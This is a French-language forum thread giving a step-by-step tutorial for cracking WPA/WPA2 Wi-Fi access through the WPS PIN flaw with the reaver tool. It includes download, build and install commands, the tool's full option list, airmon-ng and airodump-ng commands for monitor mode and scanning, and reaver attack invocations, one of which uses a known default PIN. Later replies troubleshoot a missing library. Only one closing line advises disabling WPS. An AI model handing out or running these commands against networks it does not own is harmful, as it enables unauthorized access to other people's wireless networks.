Annonce

Réduire
Aucune annonce.

Cracking WPA/WPA2 par Faille WPS

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Tutoriel Cracking WPA/WPA2 par Faille WPS

    (Je reprend en partie la news pour ne pas perdre la fil)

    Le WPS (Wi-Fi Protected Setup) est un standard de réseau local sans fil simple et sécurisé, il permet de se connecter facilement à une box pour ensuite y configurer une sécurité WPA par exemple.

    Seulement certaines box ont encore ce système d'authentification activé par défaut... Cependant Craig Heffner de Tactical Network Solutions à conçu un petit tool appelé reaver et permet de tester un certain nombre de possibilités pour s'y connecter.

    Je vais vous expliquez comment l'installer sur votre OS.

    Installation

    Ouvrir une fenêtre de terminal

    Télecharger la dernière version de reaver (actuellement la 1.2)

    Code:
    wget http://reaver-wps.googlecode.com/files/reaver-1.2.tar.gz
    Décompresser

    Code:
    tar -xvzf reaver-1.2.tar.gz
    Se placer dans le dossier /reaver-1.2/src/

    Code:
    cd reaver-1.2/src
    Configurer

    Code:
    ./configure
    Compiler

    Code:
    make
    Installer

    Code:
    make install

    Vous pouvez lancer le tool pour voir les options et commandes à votre disposition

    Code:
    reaver
    Voici les choix qui s'offrent à vous

    Code:
    [email protected]:~# reaver
    
    Reaver v1.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    Required Arguments:
    	-i, --interface=<wlan>          Name of the monitor-mode interface to use
    	-b, --bssid=<mac>               BSSID of the target AP
    
    Optional Arguments:
    	-m, --mac=<mac>                 MAC of the host system
    	-e, --essid=<ssid>              ESSID of the target AP
    	-c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    	-o, --out-file=<file>           Send output to a log file [stdout]
    	-f, --fixed                     Disable channel hopping
    	-5, --5ghz                      Use 5GHz 802.11 channels
    	-v, --verbose                   Display non-critical warnings (-vv for more)
    	-q, --quiet                     Only display critical messages
    	-h, --help                      Show help
    
    Advanced Options:
    	-d, --delay=<seconds>           Set the delay between pin attempts [1]
    	-l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [315]
    	-g, --max-attempts=<num>        Quit after num pin attempts
    	-x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    	-r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    	-t, --timeout=<seconds>         Set the receive timeout period [5]
    	-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    	-L, --ignore-locks              Ignore locked state reported by the target AP
    	-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    	-n, --nack                      Target AP always sends a NACK [Auto]
    
    Example:
    	reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

    Utilisation

    Détecter les interfaces Wifi

    Code:
    airmon-ng
    Scanner les réseaux Wifi (wlan0 est le nom de ma carte, modifiez au besoin)

    Code:
    airodump-ng wlan0
    Repérez votre BSSID

    Passer votre carte en mode monitor

    Code:
    airmon-ng start wlan0
    Essayez l'exemple de reaver cité plus haut, vous pouvez la modifier au besoin.

    Code:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
    Entrez votre BSSID lors de la phase "Scanner les réseaux Wifi"

    D'après plusieurs retours, l'opération prend entre 4h et 10h.

    Désactiver le service WPS sur votre routeur si vous ne voulez pas être victime de ce tool.
    mactux †|

    Le savoir n'est réel que s'il est partagé

  • #2
    La version en développement permet l'option -p --pin

    Code:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -p 12345670 -vv
    Ce qui permet si le pin est celui par défaut de crack la box en moins de 2 minutes
    Dernière modification par Iddl3, 03 janvier 2012, 09h48.
    WITHOUT DEVIATION FROM THE NORM, PROGRESS IS NOT POSSIBLE
    -Frank Zappa

    Commentaire


    • #3
      Super tuto mais est-ce que qqn a essayé de cracker une clé wpa ou wpa2? j'ai vu des outils sur le forum mais quel est le + efficace? avez-vous des suggestions?
      Merci
      Il faut toujours viser la lune car même en cas d'échec on atterit toujours au milieu des étoiles...

      Commentaire


      • #4
        Bonjour, j'ai besoin d'aide, quand je fais ./configure tout se passe bien jusqu'a une erreur :"error : pcap library not found" si vous avez une soloution je suis preneur.

        Merci de votre réponse

        Commentaire


        • #5
          En toute franchise, je te conseil Google traduction.

          Il te signale que la libpcap n'est pas trouvée. La solution serait donc peut être de l'installer. Et pour ca google te fournira sûrement la solution.

          Commentaire


          • #6
            Comme te l'a dit Anonyme, apprend à utiliser, google et google translate. Regarde dans ton cas, il te dit que la libpcap n'est pas trouvé ou n'existe pas.Il va s'en dire que tu sais maintenant que tu dois l'installer toi-même sur le système.

            Tu as déjà avancé. Si tu connais un peu UNIX, tu sais aussi que la commande sera du style : "apt-get install XXXX" : XXXX étant le composant à télécharger et à installer, on est encore OK.Sans rien demander, regarde, on a fait la moitié du chemin. Donc, tu te renseignes sur ce type de lib et tu trouves : libpcap-dev et libsqlite3-dev.Bon maintenant on sait que l'on a besoin de ces 2 lib pour que Reaver fonctionne et qu'ils ne sont pas installés, en plus, on sait les commandes donc il n'y a plus qu'à le faire.

            Code:
            [email protected] apt-get install libpcap-dev
            [email protected] apt-get isntall libsqlite3-dev
            Tu vois par analogie et en éliminant les points un par un, on peut facilement arriver à trouver la solution à notre problème. Le souci est qu'il démarre en anglais, en français on n'aurait pas ce souci, mais notre cerveau a tendance à faire abstraction de ce qui n'est pas conforme à l'universalité de notre apprentissage.

            Simplifie ta pensé et rejette les principes qui t'ont façonné depuis lors pour puiser dans l'immense potentiel du web et des algorithmes.
            Tu n'y arrives vraiment pas et tu butes encore. Simple comme bonjour. Tu prends Google et tu entres ainsi tes données :

            Code:
            [pcap library not found kali]
            Tu lances le moteur de recherche et tu regardes les solutions proposées. Regarde la suivante semble tout indiquer pour notre cas, en plus, elle rejoint notre solution logique.

            https://forums.kali.org/archive/index.php/t-89.html

            Voilà, je pense que tu as compris et que tu essayeras la prochaine fois de trouver par toi-même. De plus, en cherchant tu auras la chance de mieux comprendre. Il faut que tu demandes la solution que si tu es vraiment acculé contre un mur et que cela dépasse même Google, à ce moment précis, tu devras faire appel à la communauté.

            Bon courage et continue dans ta recherche. Sache que faire sans savoir ne mène nulle part. Je te conseillerai d'apprendre les réseaux et de comprendre le codage du script Reaver avant de l'utiliser, ce qui sera plus enrichissant que de simplement le mettre en action bêtement assistée du tutoriel de Mactux.

            Commentaire

            Chargement...
            X